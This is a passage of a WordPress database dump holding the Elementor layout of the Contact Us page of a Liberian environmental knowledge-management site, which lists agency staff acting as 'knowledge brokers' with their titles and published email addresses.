INSERT INTO `wp_postmeta` VALUES (23089,3336,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental 